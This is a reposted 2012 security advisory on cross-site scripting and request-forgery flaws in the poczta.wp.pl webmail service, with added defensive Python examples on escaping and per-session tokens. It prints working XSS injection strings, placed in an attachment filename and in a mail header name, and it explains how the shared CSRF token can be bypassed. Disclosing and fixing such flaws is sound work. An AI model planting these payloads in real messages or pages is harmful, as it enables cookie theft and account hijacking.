Thursday, 6 December 2012

[Full Disclosure] Poczta.WP Multiple vulnerabilities

Original: http://seclists.org/fulldisclosure/2012/Dec/68

Poczta.WP Multiple vulnerabilities full disclosure

Author: Jakub Zoczek [zoczus(x)gmail.com]

0x01 Intro

Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their e-mail service (poczta.wp.pl) is affected by multiple cross-site
scripting vulnerabilities and one almost-fixed cross-site request
forgery bug. After a long wait I got an unprofessional answer from
WP's Customer Service Manager, so I decided to post all my research
here. Thus...

0x02 XSS in mail attachments.
Reported: 10/10/2012
State: Fixed

Proof Of Concept:

For example, a JPEG picture with the filename:

sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg

...sent as an e-mail attachment.

Result:

0x03 XSRF in AntyHack and AntySpam filter (adding to white list)

Reported: 24/11/2012
State: "Fixed"

Proof Of Concept:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt

Result:

0x04 XSRF in AntyHack and AntySpam filter - bypassing 'fix' ;)

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Additional info for 0x03 - as I supposed, WP used a token in the white list form (an md5 of something, regenerated every once in a while). The problem is that the token value is probably the same for each user. For different mail accounts, different browsers, different IP addresses - the token is the same... Bypassing this protection seems to be quite simple.
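The property the advisory found in 0x04 (one token value shared by every user) is easy to test for. The following is an added example, not code from the advisory or from WP's implementation: it contrasts a site-wide, time-bucketed token with one bound to the caller's session, and gives the regression check that separates the two. The secret, session ids and the one-hour bucket are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Constructed placeholder secret; a real deployment loads this from configuration.
SERVER_SECRET = b"constructed-server-secret-do-not-reuse"


def weak_token(session_id, now=None):
    """The pattern the advisory describes: an md5 of a secret and a time
    bucket, regenerated 'every once in a while'.  The session id is ignored,
    so every user receives the same value inside the same bucket."""
    bucket = int((time.time() if now is None else now) // 3600)
    return hashlib.md5(SERVER_SECRET + str(bucket).encode()).hexdigest()


def bound_token(session_id, now=None):
    """Token bound to one session: an HMAC over the session id.  A random
    per-session value stored server-side is an equally good choice."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_bound_token(session_id, presented):
    """Server-side check performed when the white-list form is submitted."""
    return hmac.compare_digest(bound_token(session_id), presented)


def tokens_are_per_session(issuer, samples=5):
    """Regression check: tokens issued to distinct fresh sessions at the same
    instant must all differ.  Fails for weak_token, passes for bound_token."""
    now = time.time()
    issued = {issuer(secrets.token_hex(16), now) for _ in range(samples)}
    return len(issued) == samples


if __name__ == "__main__":
    print("weak issuer per-session:", tokens_are_per_session(weak_token))
    print("bound issuer per-session:", tokens_are_per_session(bound_token))
```

The check is deliberately blind to how the token is built: any issuer that hands the same value to two different sessions fails it, which is exactly the condition that lets one account's token be replayed against another.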
0x05 XSS in mail headers

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Return-Path: <zoczus () fbi pl>
Delivered-To: zoczus () wp pl (zoczus)
Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012 16:04:58 +0100
Received: from emkei.cz ([46.167.245.118]) (envelope-sender <zoczus () fbi pl>) by mx.wp.pl (WP-SMTPD) with SMTP for <zoczus () wp pl>; 30 Nov 2012 16:04:58 +0100
Received: by emkei.cz (Postfix, from userid 33) id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: zoczus () wp pl
Subject: 
From: "zoczus () fbi pl" <zoczus () fbi pl>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: zoczus () fbi pl
Reply-To: zoczus () fbi pl
Content-Type: text/plain; charset=utf-8
Message-Id: <20121130150457.D4119D5807 () emkei cz>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph] Dobre!

Result:
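Sections 0x02 and 0x05 are the same defect in two places: an untrusted string (an attachment filename, a header field name) is concatenated into the webmail's HTML. The following is an added example, not code from the advisory or from WP: it parses a constructed copy of the 0x05 headers with Python's standard email parser, shows that the payload is a syntactically valid RFC 5322 field name (so input validation alone cannot catch it), and puts the unescaped rendering beside the escaped one for both the header table and the attachment link. The `/download?name=` link format and the table layout are assumptions.

```python
import html
from email import message_from_string
from urllib.parse import quote

# Constructed sample: a trimmed copy of the advisory's 0x05 PoC headers, with
# the '@' signs that the mailing-list archive masked restored.
RAW_MESSAGE = (
    "To: zoczus@wp.pl\r\n"
    "Subject: \r\n"
    'From: "zoczus@fbi.pl" <zoczus@fbi.pl>\r\n'
    'Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces\r\n'
    "Content-Type: text/plain; charset=utf-8\r\n"
    "\r\n"
    "body\r\n"
)

# Constructed sample: the attachment filename from section 0x02.
ATTACHMENT_NAME = (
    'sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg'
)

# RFC 5322 'ftext': printable US-ASCII (33..126) except ':' (58).  '<', '"',
# '/', '=' and '>' are all permitted, so the payload above is a legal header
# *name*; rejecting "invalid" names would not have stopped it.
FTEXT = set(chr(c) for c in range(33, 127)) - {":"}


def is_rfc5322_field_name(name):
    return bool(name) and all(ch in FTEXT for ch in name)


def header_names(raw):
    """Field names exactly as the MIME parser hands them to the UI layer."""
    return [name for name, _value in message_from_string(raw).items()]


def render_headers_unsafe(raw):
    """The defect class from 0x05: untrusted strings concatenated into HTML."""
    rows = [f"<tr><th>{name}</th><td>{value}</td></tr>"
            for name, value in message_from_string(raw).items()]
    return "<table>" + "".join(rows) + "</table>"


def render_headers_safe(raw):
    """Same view with every untrusted string HTML-escaped at the output point."""
    rows = [f"<tr><th>{html.escape(name)}</th><td>{html.escape(value)}</td></tr>"
            for name, value in message_from_string(raw).items()]
    return "<table>" + "".join(rows) + "</table>"


def attachment_link_unsafe(filename):
    """The defect class from 0x02: the filename lands in an attribute and in text."""
    return f'<a href="/download?name={filename}" title="{filename}">{filename}</a>'


def attachment_link_safe(filename):
    """One encoding per context: URL-encode the query value, HTML-escape the rest."""
    return (f'<a href="/download?name={quote(filename, safe="")}" '
            f'title="{html.escape(filename, quote=True)}">{html.escape(filename)}</a>')


def leaks_markup(rendered):
    """Crude template regression check: did a raw '<img' tag survive rendering?"""
    return "<img" in rendered


if __name__ == "__main__":
    print("header table leaks:", leaks_markup(render_headers_unsafe(RAW_MESSAGE)),
          "->", leaks_markup(render_headers_safe(RAW_MESSAGE)))
    print("attachment link leaks:", leaks_markup(attachment_link_unsafe(ATTACHMENT_NAME)),
          "->", leaks_markup(attachment_link_safe(ATTACHMENT_NAME)))
```

The point of `is_rfc5322_field_name` is that the header name in the PoC passes it: the fix has to live where the string is written into HTML, and the attribute, text and URL contexts each need their own encoder.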

0x06 The end. :)


The above bugs were fixed instantly after the report was published.
